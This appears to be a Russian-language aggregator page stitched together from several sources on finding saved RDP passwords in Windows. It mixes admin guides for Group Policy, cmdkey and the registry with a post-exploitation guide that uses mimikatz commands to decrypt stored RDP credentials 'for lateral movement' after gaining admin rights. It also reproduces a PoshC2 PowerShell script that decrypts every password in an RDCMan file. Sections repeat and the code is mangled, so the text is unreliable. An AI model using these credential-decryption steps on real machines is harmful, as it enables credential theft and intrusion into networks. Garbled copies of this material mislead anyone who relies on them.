Как посмотреть сохраненный пароль rdp windows 10
Перейти к содержимому

Как посмотреть сохраненный пароль rdp windows 10

  • автор:

Как посмотреть сохраненный пароль rdp windows 10

Remote Desktop PassView is a small utility that reveals the password stored by Microsoft Remote Desktop Connection utility inside the .rdp files.

Notice: Currently, this tool doesn’t work with the latest versions of Remote Desktop Connection utility. You can use the following tools to get the passwords stored by new versions of Remote Desktop Connection (6.0 or higher):
Network Password Recovery
CredentialsFileView

Versions History
  • Version 1.02 — Removed the command-line options that export the passwords to a file from the official version. A version of this tool with full command-line support will be posted on separated Web page.
  • Version 1.01 — The configuration is now saved to a file instead of the Registry.
  • Version 1.00 — First release.
License

This utility is released as freeware. You are allowed to freely distribute this utility via floppy disk, CD-ROM, Internet, or in any other way, as long as you don’t charge anything for this. If you distribute this utility, you must include all files in the distribution package, without any modification !
Be aware that selling this utility as a part of a software package is not allowed !

Disclaimer

The software is provided «AS IS» without any warranty, either expressed or implied, including, but not limited to, the implied warranties of merchantability and fitness for a particular purpose. The author will not be liable for any special, incidental, consequential or indirect damages due to loss of data or any other reason.

Using Remote Desktop PassView

Remote Desktop PassView doesn’t require any installation process or additional DLL files. Just copy the executable (rdpv.exe) to any folder you like, and run it. After you run rdpv.exe, the main window display the passwords of .rdp located under your «My Documents» folder. The default .rdp file (Default.rdp) is usually stored in this location
If you want to recover that password of another .rdp file, just drag the file from Explorer into the window of Remote Desktop PassView utility or use the «Open .rdp File» option from the File menu.
Be aware that Remote Desktop PassView can only recover the passwords created by your current logged on user. It cannot recover the passwords of .rdp files created by other users.

Translating Remote Desktop PassView To Another Language
  1. Run Remote Desktop PassView with /savelangfile parameter:
    rdpv.exe /savelangfile
    A file named rdpv_lng.ini will be created in the folder of Remote Desktop PassView utility.
  2. Open the created language file in Notepad or in any other text editor.
  3. Translate all menus, dialog-boxes, and string entries to the desired language.
  4. After you finish the translation, Run Remote Desktop PassView, and all translated strings will be loaded from the language file.
    If you want to run Remote Desktop PassView without the translation, simply rename the language file, or move it to another folder.
Feedback

If you have any problem, suggestion, comment, or you found a bug in my utility, you can send a message to nirsofer@yahoo.com

Remote Desktop PassView is also available in other languages. In order to change the language of Remote Desktop PassView, download the appropriate language zip file, extract the ‘rdpv_lng.ini’, and put it in the same folder that you Installed Remote Desktop PassView utility.

Где хранятся пароли rdp в windows 10

Ситуация:имеется общедоступное хранилище rdp файлов с опубликованными различными прилождениями на windows server 2008r2 enterprise (russian), клиентам через gp распространяются линки на эти файлы, некоторые пользователи при первом подключении сохраняют логин/пароль но вводят их неверное.Внимание ворос — что где нужно удалить чтобы сбросить сохраненные данные? Вариант через запуск mstsc.exe с очисткой данных не подходит.Искал ветки в реестре HKCU и файлы в профиле, но ни к чему работающему не пришел.

  • Remove From My Forums

Вопрос

Ситуация:
имеется общедоступное хранилище rdp файлов с опубликованными различными прилождениями на windows server 2008r2 enterprise (russian), клиентам через gp распространяются линки на эти файлы, некоторые пользователи при первом подключении сохраняют логин/пароль но вводят их неверное.
Внимание ворос — что где нужно удалить чтобы сбросить сохраненные данные? Вариант через запуск mstsc.exe с очисткой данных не подходит.
Искал ветки в реестре HKCU и файлы в профиле, но ни к чему работающему не пришел. P.S. Интересно именно удаленная очистка сохранение — те ветка реестра и/или файлы задействованные в сохранении rpd пароля/логина, дабы не подключаться к gui каждого.

  • Изменено 28 сентября 2009 г. 14:46
    Добавлен p.s.

Ответы

Пуск -> Настройка -> Панель управления -> Учётные записи пользователей -> Закладка «Дополнительно» -> Кнопка «Управление паролями»

MCSE, MCTS, MCITP, STS, VTSP

Добавлю свои 5 копеек: можно автоматизировать удаление сохраненных Сетевых паролей (Stored User Names andPasswords) при помощи простого логон скрипта и утилиты коммандной строки cmdkey

  • Предложено в качестве ответа
    Buchenkov Andrey
    29 сентября 2009 г. 5:55
  • Помечено в качестве ответа
    gamumba
    29 сентября 2009 г. 6:55

Так выглядит финальный диалог Мастера программы с найденными и расшифрованными паролями удаленного рабочего стола (в автоматическом режиме работы).

Пароли удаленного рабочего стола

Пароли Remote Desktop Connections хранятся в *.rdp файлах и обычно находятся в папке ‘My Documents‘ текущего пользователя. При входе в ручной режим, NPRW автоматически сканирует ваш диск в поиске данных файлов.

Если *.rdp файл по какой-то причине не был найден, то можно воспользоваться поиском самостоятельно и указать путь к нему вручную.

Decrypting Remote Desktop passwords manually

Посмотреть список доступных конфигураций удаленного рабочего стола можно из меню Пуск -> Все программы -> Стандартные -> Связь -> Подключение к удаленному рабочему столу.

После того, как необходимая конфигурация будет выбрана, можно переходить к следующему шагу Мастера программы — указанию дополнительных параметров для расшифровки. Поскольку пароль удаленного рабочего стола шифруется с помощью системного механизма DPAPI, то нам необходимо знать три вещи:

  1. Логон пароль владельца информации (rdp файла в нашем случае)
  2. Мастер Ключ пользователя
  3. И его SID.

Диалог DPAPI

Как правило, в случае с локальной учетной записью, последние два параметра заполняются программой автоматически. Иначе, вам необходимо позаботиться об этом самостоятельно.

Встроенный RDP клиент Windows (mstsc.exe) позволяет сохранить на компьютере имя и пароль пользователя для подключения к удаленному рабочему столу. Благодаря этому пользователю не нужно каждый раз вводить пароль для подключения к удаленному RDP компьютеру/серверу. В этой статье мы рассмотрим, как разрешить сохранять учетные данные для RDP подключений в Windows, и что делать, если несмотря на все настройки, у пользователей не сохраняются пароли для RDP подключения (пароль запрашивается каждый раз)

  • Как сохранить пароль для RDP подключения в Windows?
  • Что делать, если в Windows не сохраняется пароль для RDP подключения?
  • Политика проверки подлинности сервере не допускает подключение сохраненными учетными данными
  • Credential Guard в Защитнике Windows не разрешает использовать сохраненные учетные данные

Как сохранить пароль для RDP подключения в Windows?

По умолчанию Windows разрешает пользователям сохранять пароли для RDP подключений. Для этого в окне клиента Remote Desktop Connection (mstsc.exe) пользователь должен ввести имя удаленного RDP компьютера, учетную запись и поставить галку “Разрешить мне сохранять учетные данные” (Allow me to save credential). После того, как пользователь нажимает кнопку “Подключить”, RDP сервер запрашивает пароль и компьютер сохраняет его в Windows Credential Manager (не в .RDP файл).

сохранить данные для rdp подключения

При следующем подключении к удаленному RDP серверу под этим же пользователем, клиент автоматически получит сохраненный пароль из менеджера паролей Windows и использует его для RDP-аутентификации.

Если для данного компьютера имеется сохраненный пароль, в окне RDP клиента будет указано:

При подключении к данному компьютеру будут использоваться сохранённые учетные данные. Эти учетные данные можно изменить или удалить.
Saved credentials will be used to connect to this computer. You can edit or delete these credentials.

При подключении к удаленному работчемустолу будут использоваться сохранённые учетные данные

В большинстве случаев администраторы не рекомендуют пользователям сохранять пароли подключений в Windows. Например, в домене Active Directory лучше настроить SSO (Single Sign-On) для прозрачной RDP аутентификации.

По умолчанию Windows не разрешает пользователю использовать сохраненный пароль RDP подключения с компьютера, добавленного в домен Active Directory, к компьютеру/серверу, который находится в другом домене или рабочей группе. Несмотря на то, что пароль для подключения сохранен в Credentials Manager, Windows не позволяет его использовать, и требует от пользователя каждый раз вводить пароль. Также Windows не разрешает использовать сохраненный пароль для RDP, если вы подключаетесь не под доменной, а под локальной учетной записью.

При попытке RDP подключения с сохраненным паролем в этой ситуации появляется окно с ошибкой:

Your Credentials did not work

Your system administrator does not allow the use of saved credentials to log on to the remote computer CompName because its identity is not fully verified. Please enter new credentials.

Или (в русской редакции Windows 10):

Недопустимые учетные данные
Системный администратор запретил использовать сохраненные учетные данные для входа в систему удаленного компьютера CompName, так как его подлинность проверена не полностью. Введите новые учетные данные.

Your system administrator does not allow the use of saved credentials to log on to the remote computer

Windows считает такое подключение небезопасным, т.к. отсутствуют доверительные отношения между этим компьютером и удаленным компьютером/сервером в другом домене (или рабочей группе).

Вы можете изменить эти настройки на компьютере, с которого выполняется RDP подключение:

  1. Откройте редактор локальной GPO, нажав Win + R ->gpedit.msc ; gpedit.msc
  2. В редакторе GPO перейдите в раздел Computer Configuration –> Administrative Templates –> System –> Credentials Delegation (Конфигурация компьютера -> Административные шаблоны -> Система -> Передача учетных данных). Найдите политику с именем Allow delegating saved credentials with NTLM-only server authentication (Разрешить передачу сохраненных учетных данных с проверкой подлинности сервера только NTLM); политика Разрешить делегирование сохраненных учетных данных с проверкой подлинности сервера только NTLM
  3. Дважды щелкните по политике. Включите политику (Enable) и нажмите на кнопку Показать (Show); Allow delegating saved credentials with NTLM-only server authentication
  4. В открывшемся окне нужно будет указать список удаленных компьютеров (серверов), для которых будет разрешено использовать сохранные пароли для RDP подключения. Список удаленных компьютеров нужно указать в следующих форматах:
    • TERMSRV/server1
      — разрешить использование сохранённых паролей для RDP подключения к одному конкретному компьютеру/серверу;
    • TERMSRV/*.winitpro.ru
      — разрешить RDP подключение ко всем компьютерам в домене winitpro.ru;
    • TERMSRV/*
      — разрешить использование сохранённого пароля для подключения к любым компьютерам.

список termsrv серверов, для авторизации на которых можно использовать сохраненный пароль rdp

Примечание. TERMSRV нужно обязательно писать в верхнем регистре, а имя компьютера должно полностью соответствовать тому, которое вы указываете в поле подключения RDP клиента.

Этим настройкам GPO соответствуют следующие параметры реестра:

Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsCredentialsDelegation] "AllowSavedCredentialsWhenNTLMOnly"=dword:00000001 “AllowSavedCredentials”=dword:00000001 [HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsCredentialsDelegationAllowSavedCredentialsWhenNTLMOnly] "1"="TERMSRV/*" [HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindowsCredentialsDelegationAllowSavedCredentials] "1"="TERMSRV/*" [HKEY_LOCAL_MACHINESOFTWAREWOW6432NodePoliciesMicrosoftWindowsCredentialsDelegation] “AllowSavedCredentialsWhenNTLMOnly”=dword:00000001 “AllowSavedCredentials”=dword:00000001 [HKEY_LOCAL_MACHINESOFTWAREWOW6432NodePoliciesMicrosoftWindowsCredentialsDelegationAllowSavedCredentialsWhenNTLMOnly] "1"="TERMSRV/*" [HKEY_LOCAL_MACHINESOFTWAREWOW6432NodePoliciesMicrosoftWindowsCredentialsDelegationAllowSavedCredentials] "1"="TERMSRV/*"
Credential Manager ErrorUnable to save credentials. To save credentials in this vault, check your computer configuration.Error code: 0x80070520 Error Message: A specified logon session does not exist. It may already have been terminated.

Теперь при выполнении RDP подключения клиент mstsc сможет использовать сохранённый пароль.

rdp подключение с сохраненым паролем

Вы можете вывести список сохранённых паролей для RDP подключений с помощью команды:

cmdkey /list ^| findstr «target=TERMSRV»

cmdkey вывести список сораненных паролей для rdp (termsrv)

Чтобы очистить сохраненные пароли подключений, выполните команду:

For /F «tokens=1,2 delims= » %G in (‘cmdkey /list ^| findstr «target=TERMSRV»‘) do cmdkey /delete %H

С помощью локального редактора групповых политик вы сможете переопределить политику только на локальном компьютере. Если вы хотите чтобы политика разрешения использования сохранённых паролей для RDP подключения действовала на множество компьютеров домена, используете доменные политики, которые настраиваются с помощью консоли gpmc.msc.

Что делать, если в Windows не сохраняется пароль для RDP подключения?

Если вы настроили Windows по инструкции выше, но клиент все равно при каждом повторном RDP подключении требует ввести пароль следует проверить следующее:

  1. В окне RDP подключения нажмите на кнопку “Показать параметры” и убедитесь, что опция “Всегда запрашивать учетные данные” (Always ask for credentials) не выбрана; mstsc - всегда запрашивать учетные данные rdp
  2. Если вы используете для подключения сохранённый RDP файл, проверьте, что параметр “prompt for credentials” равен 0 (
    prompt for credentials:i:0
    ); prompt for credentials:i:0
  3. Запустите редактор локальной групповой политики
    gpedit.msc
    , перейдите в раздел Конфигурация компьютера -> Компоненты Windows -> Службы удаленных рабочих столов -> Клиент подключения к удаленному рабочему столу (Computer Configuration -> Administrative Templates -> Windows Components -> Remote Desktop Services -> Remote Desktop Connection Client). Параметры “Запретить сохранение паролей” (Do not allow passwords to be saved) и Prompt for credentials on the client computer должны быть не заданы или отключены. Также убедитесь, что он отключен в результирующей политике на вашем компьютере (html отчет с применёнными настройками доменных политик можно сформировать с помощью gpresult); Запретить сохранение паролей rdp
  4. Удалите все сохраненные пароли в менеджере паролей Windows (Credential Manager). Наберите
    control userpasswords2
    и в окне “Учетные записи пользователей” перейдите на вкладку “Дополнительно” и нажмите на кнопку “Управление паролями”; управление сохраненеыми паролями в windows В открывшемся окне выберите “Учетные данные Windows”. Найдите и удалите все сохраненные RDP пароли (начинаются с TERMSRV/…). сохраненный пароль для rdp

сохранить пароль для rdp подключеняи к серверу

Из этого окна вы можете самостоятельно добавить учетных данные для RDP подключений. Обратите внимание, что имя удаленного RDP сервера (компьютера) нужно указывать в формате TERMSRVserver_name1. При очистке истории RDP подключений на компьютере, не забывайте удалять сохраненные пароли.

  • Вход с сохраненным паролем также не будет работать, если удаленный RDP сервер давно не обновлялся и при подключении к нему появляется ошибка CredSSP encryption oracle remediation.
  • После этого, пользователи смогут использовать свои сохраненные пароли для rdp подключений.

    Политика проверки подлинности сервере не допускает подключение сохраненными учетными данными

    При подключении к RDP хосту или ферме RDS с помощью сохраненного пароля может появится ошибка:

    Windows Security Your credentials did not work The server’s authentication policy does not allow connection requests using saved credentials. Please enter new credentials.
    Политика проверки подлинности на сервере не допускает запросы на подключение с использованием сохраненных учетных данных.

    Политика проверки подлинности на сервере не допускает запросы на подключение с использованием сохраненных учетных данных.

    В этом случае на удаленном сервере нужно отключить параметр “Always prompt for password upon connection” в разделе Computer Configuration -> Administrative Templates -> Windows Components -> Remote Desktop Services -> Remote Desktop Session Host -> Security.

    параметр групповой политики: всегда запрашивать пароль при rdp подключении

    Если эта политика включена, RDP хост всегда запрашивает у клиента пароль для подключения.

    Можно включить этот параметр через реестр:

    REG add «HKLMSOFTWAREPoliciesMicrosoftWindows NTTerminal Services» /v fPromptForPassword /t REG_DWORD /d 0 /f

    Credential Guard в Защитнике Windows не разрешает использовать сохраненные учетные данные

    После обновления до Windows 11 22H2 пользователи стали жаловаться, что теперь они не могут использовать сохраненные пароли для RDP подключений:

    Windows Security: Your credentials did not work Windows Defender Credential Guard does not allow using saved credentials. Please enter your credentials.
    Credential Guard в Защитнике Windows не разрешает использовать сохраненные учетные данные.

    Credential Guard в Защитнике Windows не разрешает использовать сохраненные учетные данные

    Представленные еще в Windows 10 1607 компонент Windows Defender Remote Credential Guard должен защищать ваши учетные данные для RDP подключений. В обновлении 22H2 по умолчанию он разрешает использовать сохраненные учетные данные только при использовании Kerberos аутентификации на RDP хосте. Если нельзя использовать Kerberos (контроллер домена не доступен, или вы подключаетесь к хосту в рабочей группе), Remote Credential Guard блокирует аутентификацию с помощью NTLM.

    Для решения этой проблемы придется отключить Credential Guard через реестр:

    New-ItemProperty -Path «HKLM:SystemCurrentControlSetControlLSA» -Name «LsaCfgFlags» -PropertyType «DWORD» -Value 0 -Force

    0x01 введение

    После получения полномочий администратора компьютера интрасети проверьте, существует ли локально сохраненный пароль для подключения RDP, и расшифруйте сохраненный пароль для подключения RDP локально.После успешного дешифрования вы можете использовать эти учетные данные для продолжения горизонтального перемещения.

    0x02 Получить пароль RDP, сохраненный локально на управляемой машине

    Один, мимикатц

    1. Проверьте целевой компьютер, к которому локальный компьютер подключен локально.

    reg query "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /s 

    2. Проверьте, есть ли в этом каталоге файл паролей RDP для локального пользователя.

    dir /a %userprofile%AppDataLocalMicrosoftCredentials* 

    Просмотр информации об удаленном хосте, сохраненной локально

    cmdkey /list 

    3. Выберите файл паролей, чтобы расшифровать его. Здесь вам нужно записать значение guidMasterKey, и вы найдете соответствующий мастер-ключ позже через guidMasterKey.

    mimikatz # privilege::debug mimikatz # dpapi::cred /in:C:UsersAdministratorAppDataLocalMicrosoftCredentials8781378F7D47006A4FC98D2F8A266F58 

    4. Найдите соответствующий мастер-ключ в соответствии с guidMasterKey.

    mimikatz # sekurlsa::dpapi 

    5. Расшифруйте простой текстовый пароль RDP-подключения с помощью Masterkey.

    mimikatz # dpapi::cred /in:C:UsersAdministratorAppDataLocalMicrosoftCredentials8781378F7D47006A4FC98D2F8A266F58 /masterkey:1df6b7a86b7aa3238c6899b1b4fd7b4ccba852db9b2ea611bbb7943f34b788f55d27835591ccde1e6c643d9aca724fd495282f5fc92ee80746262d8759b9d23d 

    Два, netpass

    скачать:
    netpass


    использовать:
    Дважды щелкните netpass.exe.

    Три, другие

    Скрипт Powershell для автоматизации дешифрования …

    Как посмотреть сохраненный пароль rdp windows 10

    Remote Desktop PassView is a small utility that reveals the password stored by
    Microsoft Remote Desktop Connection utility inside the .rdp files.

    Notice: Currently, this tool doesn’t work with the latest versions of Remote Desktop Connection utility.
    You can use the following tools to get the passwords stored by new versions of Remote Desktop Connection (6.0 or higher):

    Network Password Recovery

    Versions History
    • Version 1.02 — Removed the command-line options that export the passwords to a file from the official version. A version of this tool with full command-line support will be posted on separated Web page.
    • Version 1.01 — The configuration is now saved to a file instead of the Registry.
    • Version 1.00 — First release.
    License

    This utility is released as freeware.
    You are allowed to freely distribute this utility via floppy disk, CD-ROM,
    Internet, or in any other way, as long as you don’t charge anything for this.
    If you distribute this utility, you must include all files in
    the distribution package, without any modification !

    Be aware that selling this utility as a part of a software package is not allowed !

    Disclaimer

    The software is provided «AS IS» without any warranty, either expressed or implied,
    including, but not limited to, the implied warranties of merchantability and fitness
    for a particular purpose. The author will not be liable for any special, incidental,
    consequential or indirect damages due to loss of data or any other reason.

    Using Remote Desktop PassView

    Remote Desktop PassView doesn’t require any installation process or additional DLL files.
    Just copy the executable (rdpv.exe) to any folder you like, and run it.
    After you run rdpv.exe, the main window display the passwords of .rdp located under your
    «My Documents» folder. The default .rdp file (Default.rdp) is usually stored in this location

    If you want to recover that password of another .rdp file, just drag the file from Explorer into
    the window of Remote Desktop PassView utility or use the «Open .rdp File» option from the File menu.

    Be aware that Remote Desktop PassView can only recover the passwords created by your current
    logged on user. It cannot recover the passwords of .rdp files created by other users.

    Translating Remote Desktop PassView To Another Language

    Remote Desktop PassView allows you to easily translate all menus, dialog-boxes, and other strings
    to other languages.

    In order to do that, follow the instructions below:

      Run Remote Desktop PassView with /savelangfile parameter:

    Feedback

    If you have any problem, suggestion, comment, or you found a bug in my utility,
    you can send a message to nirsofer@yahoo.com

    Remote Desktop PassView is also available in other languages. In order to change the language of
    Remote Desktop PassView, download the appropriate language zip file, extract the ‘rdpv_lng.ini’,
    and put it in the same folder that you Installed Remote Desktop PassView utility.

    0x01 введение

    После получения полномочий администратора компьютера интрасети проверьте, существует ли локально сохраненный пароль для подключения RDP, и расшифруйте сохраненный пароль для подключения RDP локально.После успешного дешифрования вы можете использовать эти учетные данные для продолжения горизонтального перемещения.

    0x02 Получить пароль RDP, сохраненный локально на управляемой машине

    Один, мимикатц

    1. Проверьте целевой компьютер, к которому локальный компьютер подключен локально.

    reg query "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /s 

    2. Проверьте, есть ли в этом каталоге файл паролей RDP для локального пользователя.

    dir /a %userprofile%AppDataLocalMicrosoftCredentials* 

    Просмотр информации об удаленном хосте, сохраненной локально

    cmdkey /list 

    3. Выберите файл паролей, чтобы расшифровать его. Здесь вам нужно записать значение guidMasterKey, и вы найдете соответствующий мастер-ключ позже через guidMasterKey.

    mimikatz # privilege::debug mimikatz # dpapi::cred /in:C:UsersAdministratorAppDataLocalMicrosoftCredentials8781378F7D47006A4FC98D2F8A266F58 

    4. Найдите соответствующий мастер-ключ в соответствии с guidMasterKey.

    mimikatz # sekurlsa::dpapi 

    5. Расшифруйте простой текстовый пароль RDP-подключения с помощью Masterkey.

    mimikatz # dpapi::cred /in:C:UsersAdministratorAppDataLocalMicrosoftCredentials8781378F7D47006A4FC98D2F8A266F58 /masterkey:1df6b7a86b7aa3238c6899b1b4fd7b4ccba852db9b2ea611bbb7943f34b788f55d27835591ccde1e6c643d9aca724fd495282f5fc92ee80746262d8759b9d23d 

    Два, netpass

    скачать:
    netpass


    использовать:
    Дважды щелкните netpass.exe.

    Три, другие

    Скрипт Powershell для автоматизации дешифрования …

    • Remove From My Forums

    Вопрос

    Ситуация:
    имеется общедоступное хранилище rdp файлов с опубликованными различными прилождениями на windows server 2008r2 enterprise (russian), клиентам через gp распространяются линки на эти файлы, некоторые пользователи при первом подключении сохраняют логин/пароль но вводят их неверное.
    Внимание ворос — что где нужно удалить чтобы сбросить сохраненные данные? Вариант через запуск mstsc.exe с очисткой данных не подходит.
    Искал ветки в реестре HKCU и файлы в профиле, но ни к чему работающему не пришел. P.S. Интересно именно удаленная очистка сохранение — те ветка реестра и/или файлы задействованные в сохранении rpd пароля/логина, дабы не подключаться к gui каждого.

    • Изменено 28 сентября 2009 г. 14:46
      Добавлен p.s.

    Ответы

    Пуск -> Настройка -> Панель управления -> Учётные записи пользователей -> Закладка «Дополнительно» -> Кнопка «Управление паролями»

    MCSE, MCTS, MCITP, STS, VTSP

    Добавлю свои 5 копеек: можно автоматизировать удаление сохраненных Сетевых паролей (Stored User Names andPasswords) при помощи простого логон скрипта и утилиты коммандной строки cmdkey

    • Предложено в качестве ответа
      Buchenkov Andrey
      29 сентября 2009 г. 5:55
    • Помечено в качестве ответа
      gamumba
      29 сентября 2009 г. 6:55

    Где хранит пароли RDP-клиент? (win7)

    Реально ли выдернуть учетку?

    1 — 07.10.12 — 13:51

    Панель управления — учетные записи пользователей — диспетчер учетных данных

    2 — 07.10.12 — 16:35

    (1) да при чем тут учетки юзеров?

    Где физически хранятся пароли (хеши) от RDP-клиента?

    3 — 07.10.12 — 16:36

    учись пользоваться яндексом и гуглом

    4 — 07.10.12 — 16:36

    (2) в моих документах файлики лежат рдпшные

    скрытые вроде как

    5 — 07.10.12 — 16:38

    6 — 07.10.12 — 16:41

    Итак, на рабочем столе есть ярлык RDP. В нем сохранена учетная запись для подключения (user&pass)

    Мне пароль нада посмотреть

    7 — 07.10.12 — 23:32

    ярлык указывает на %windir%system32mstsc.exe

    :)

    пароля там нет

    8 — 07.10.12 — 23:33

    9 — 07.10.12 — 23:33

    всё в реестре, в жутко зашифрованном виде

    10 — 07.10.12 — 23:33

    11 — 07.10.12 — 23:34

    12 — 07.10.12 — 23:38

    (9) Не уверен, что даже сама винда сможет расшифровать пароль. Скорее всего, хранятся только кеши.

    13 — 07.10.12 — 23:42

    винда точно не сможет

    14 — 07.10.12 — 23:45

    (10) а по ссылке сходить. все там можно

    Чтобы использовать cmdkey , чтобы добавить имя пользователя и пароль для пользователя Mikedan доступ к компьютеру Server01 с паролем Kleo, типа:

    cmdkey / дополнения: сервер / пользователь: mikedan / пароль: Kleo

    Чтобы использовать cmdkey , чтобы добавить имя пользователя и пароль для пользователя Mikedan доступ к компьютеру Server01 и приглашение для ввода пароля всякий раз, когда Server01 доступ, типа:

    cmdkey / дополнения: сервер / пользователь: mikedan

    15 — 07.10.12 — 23:47

    16 — 07.10.12 — 23:53

    Отображает список имен пользователей и учетных данных. Если TargetName не указано, все сохраненные имена пользователей и учетные данные будут перечислены.

    17 — 07.10.12 — 23:57

    речь вообще-то о паролях

    18 — 07.10.12 — 23:58

    :)

    так что «и?»

    19 — 08.10.12 — 00:00

    20 — 08.10.12 — 00:01

    ну так там внимательно по ссылке.

    Creates, lists and deletes stored user names and passwords or credentials.

    passwords это слово видим ?

    21 — 08.10.12 — 00:04

    (0) Вообще на сколько я читал пароли кодируются с привязкой то ли к учетной записи, то ли к машине. Тоесть вроде как расшифровать можно но только на том же компьютере/пользователе.

    Погугли на тему RDP + CryptProtectData и CryptUnrotectData

    22 — 08.10.12 — 00:08

    23 — 08.10.12 — 00:26

    (0) забыл пароль, смени на новый.

    ;)

    ИМХО, такой вопрос (попытка на него ответить) не только правила форума нарушает, но и попадает под действие УК РФ

    24 — 08.10.12 — 09:30

    (23) да, вы правы. Пароль забыл, пароль сменю.

    ;)

    Тему можно закрывать

    Is there a way to decrypt a password stored in an .rdg (Remote Desktop Connection Manager) file, providing you know the username and password of the user who created it?

    I know that the password is encrypted based on the user who created it. The user is a domain user, and I am trying to use the .rdg file at home (domain unavailable). Can I «simulate» being the domain user, since I know the username+password? Remember, network access to the domain is unavailable. Physical access to the original machine is also unavailable.

    I have tried this method, but (unsurprisingly) I get

    «Exception calling DecryptString with 2 argument(s): Failed to decrypt using XXXX credential»

    (XXX is my current home login.)

    1,378 9 silver badges 20 bronze badges

    asked Jul 20, 2016 at 14:33

    Here’s a Powershell script that will do the job…

    Open the RDG file with notepad to get the encrypted password. I found
    that RDG contained the ‘profiles’ I had saved, as well as the
    passwords saved per server.

    Now use the same computer and windows account that created the RDG
    file to run the following powershell commands to see the password. You
    have to use the same account to decrypt.

    > $PwdString = 'EnCryptEdStringFRoMRDGfile==' > Copy-Item 'C:Program Files (x86)MicrosoftRemote Desktop Connection ManagerRDCMan.exe' 'C:tempRDCMan.dll' > Import-Module 'C:tempRDCMan.dll' > $EncryptionSettings = New-Object -TypeName RdcMan.EncryptionSettings > [RdcMan.Encryption]::DecryptString($PwdString, $EncryptionSettings) 

    Source:
    https://blog.prudhomme.wtf/use-powershell-to-decrypt-password-stored-in-a-rdg-file/ by THOMAS PRUD’HOMME

    answered Jan 4, 2017 at 14:59

    211 2 silver badges 3 bronze badges

    Use the following Powershell script to decrypt all passwords in an RDG file in a single shot.
    https://github.com/nettitude/PoshC2/blob/master/resources/modules/Decrypt-RDCMan.ps1

    In case the link fails here’s the content for reference:

    function Decrypt-RDCMan ($FilePath) < if (!$FilePath) < [xml]$config = Get-Content "$env:LOCALAPPDATAmicrosoftremote desktop connection managerrdcman.settings" $Xml = Select-Xml -Xml $config -XPath "//FilesToOpen/*" $Xml | select-object -ExpandProperty "Node"| % > else < [xml]$Types = Get-Content $FilePath $Xml = Select-Xml -Xml $Types -XPath "//logonCredentials" # depending on the RDCMan version we may need to change the XML search $Xml | select-object -ExpandProperty "Node" | % < $pass = Decrypt-DPAPI $_.Password; $_.Domain + "" + $_.Username + " - " + $Pass + " - " + "Hash:" + $_.Password + "`n" ># depending on the RDCMan version, we may have to use search through the #text field in the XML structure $Xml | select-object -ExpandProperty "Node" | % < $pass = Decrypt-DPAPI $_.Password."#text"; $_.Domain + "" + $_.Username + "`n" + $Pass + " - Hash: " + $_.Password."#text" + "`n">> > function Decrypt-DPAPI ($EncryptedString) < # load the Security Assembly into the PS runspace Add-Type -assembly System.Security $encoding= [System.Text.Encoding]::ASCII $uencoding = [System.Text.Encoding]::UNICODE # try and decrypt the password with the CurrentUser Scope try < $encryptedBytes = [System.Convert]::FromBase64String($encryptedstring) $bytes1 = [System.Security.Cryptography.ProtectedData]::Unprotect($encryptedBytes, $null, [System.Security.Cryptography.DataProtectionScope]::CurrentUser) [System.Text.Encoding]::Convert([System.Text.Encoding]::UNICODE, $encoding, $bytes1) | % < $myStr1 += [char]$_>echo $myStr1 > catch < # try and decrypt the password with the LocalMachine Scope only if the CurrentUser fails try < $encryptedBytes = [System.Convert]::FromBase64String($encryptedstring) $bytes1 = [System.Security.Cryptography.ProtectedData]::Unprotect($encryptedBytes, $null, [System.Security.Cryptography.DataProtectionScope]::LocalMachine) [System.Text.Encoding]::Convert([System.Text.Encoding]::UNICODE, $encoding, $bytes1) | % < $myStr1 += [char]$_>echo $myStr1 > catch < echo "Could not decrypt password" >> > 

    Execute the script in Powershell ISE, that should register the functions. Then simple run:

    Decrypt-RDCMan -FilePath MyRDGfile.rdg

    answered Oct 20, 2018 at 8:03

    Is there a way to decrypt a password stored in an .rdg (Remote Desktop Connection Manager) file, providing you know the username and password of the user who created it?

    I know that the password is encrypted based on the user who created it. The user is a domain user, and I am trying to use the .rdg file at home (domain unavailable). Can I «simulate» being the domain user, since I know the username+password? Remember, network access to the domain is unavailable. Physical access to the original machine is also unavailable.

    I have tried this method, but (unsurprisingly) I get

    «Exception calling DecryptString with 2 argument(s): Failed to decrypt using XXXX credential»

    (XXX is my current home login.)

    1,378 9 silver badges 20 bronze badges

    asked Jul 20, 2016 at 14:33

    Here’s a Powershell script that will do the job…

    Open the RDG file with notepad to get the encrypted password. I found
    that RDG contained the ‘profiles’ I had saved, as well as the
    passwords saved per server.

    Now use the same computer and windows account that created the RDG
    file to run the following powershell commands to see the password. You
    have to use the same account to decrypt.

    > $PwdString = 'EnCryptEdStringFRoMRDGfile==' > Copy-Item 'C:Program Files (x86)MicrosoftRemote Desktop Connection ManagerRDCMan.exe' 'C:tempRDCMan.dll' > Import-Module 'C:tempRDCMan.dll' > $EncryptionSettings = New-Object -TypeName RdcMan.EncryptionSettings > [RdcMan.Encryption]::DecryptString($PwdString, $EncryptionSettings) 

    Source:
    https://blog.prudhomme.wtf/use-powershell-to-decrypt-password-stored-in-a-rdg-file/ by THOMAS PRUD’HOMME

    answered Jan 4, 2017 at 14:59

    211 2 silver badges 3 bronze badges

    Use the following Powershell script to decrypt all passwords in an RDG file in a single shot.
    https://github.com/nettitude/PoshC2/blob/master/resources/modules/Decrypt-RDCMan.ps1

    In case the link fails here’s the content for reference:

